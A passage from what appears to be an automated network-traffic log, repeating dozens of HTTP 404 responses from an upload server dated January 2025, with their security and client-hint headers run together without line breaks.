ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQejWijWPmdtqOOVevx0VQqlRNRrLb48Tbrt1BoftBF-dXawOk8aphvyqEjBbtSrzffb37go3cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-1RuAlN_AFEj93_ri0aLb0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ-7sPfPJgZ8UglhXntAPa-4FEl7_qqnxhXP4nJWpIA8ZXhg22qloNRWoLXZoGBVGu5nJKN8iQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-txyYCFHWlemBgCO_s4WLRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS4K3v691dd15FpeR0vPdjYpFmI3fYVqbjwMi7_88B_fX5in2LrIy0viCt5adCHf4lTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-q-qllZzet6PSwiZDCbNzUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQxSg3cPI-AKBTmkLkAE35CTiipc2INTbwpvf5tQnLFX9D99ewl6NbwCaUvMQASXCFw0luVYNwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:15 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-RSO5_EGf8vY3h2WN5sK5iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT8nGpbmcG2OB-TbH9dBcdmOKT13tDd1ykyQCQX_rR0T10xFVBQu351kDdIUoquXhDDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:18 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-UJ88aMND4j4t6XqBeWzMGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ0wwe0MIGr6svzc_2bDbviQSEq6AMiE5rdXxCVwnAEoc1AmvHseanm6LvjqkIFBMmCV0gumwgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:20 GMTContent-Security-Policy: script-src 'nonce--leIgwePYLAne0ioj4VpRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTZ4J6zhRp4YYWSLLYOz2LUV9erdwLBPgzWn_9pVfXOPsoORgS09P7A91mDbrba_C9WHh45PSwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6awo2_G_nTMKqICplqMb9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRAqpqPIL_uVxjATJnHB4R7Hgdb167rgZi85s6EKTCvxsdeDI7Xlm1T3IgX8YBhb1zJNXm3V2QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Q587Fl8PAMrt2tlK1wnAxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQFBZZnKMRfgTeRIhCvBnEdUmikbaZYZQ4HZgCgZX77xJfcjo9zOx07esj912NV-alwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Tv6WPKivlf6l62SD8PNK3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ7oiarDp-S-H1oEypFMqlSf4UfUKGh4x2MHb1UPwctkw1qSgB5fozksN0BDYpjx_VipdRqacgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:29 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MZ76xVUieR744R2azQWmWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTAAc0OKIIuUvGcNeUOOXq_H5G-nN3--xhr9X5jciEjk73LrWR1tkjaSQT84uUjeS6JGWTFrzYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:31 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-OVH4PVNzRNZK_kIP8Of2Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ4J6luVjsf5UzUvt8nNSgTiGcsZEJgh9QrG8nL_8qY6sf4c6TDd8505iH1izWjYZaPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_5SKqCsWboxf1JsByqZpWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTI9oAh2-K8x_9ZFSSjwelb9vLB_aBikr6pTfHlaYLl5Wk8nxOJYzyj3e9oBxFYvyZtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:36 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-VTYqubCigAwQRc3YhHj23A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRTuIO6slElX1NK4eSrKYJwXkc217yz3tKuRL6iy8cBHIgVI1i3MqXRv16MRbcbzvtTTybNcn4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-541YQCZUsFL27x04-D9NZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSaU1zR7x_jyOQOg7yUUp4Pe0wxX0lN8DNMZKnZZng-ypQr_orzOSh0sa-INFda2dIskYn46OQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:41 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-kWSbCkBuvMyrfOd-mR33MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri 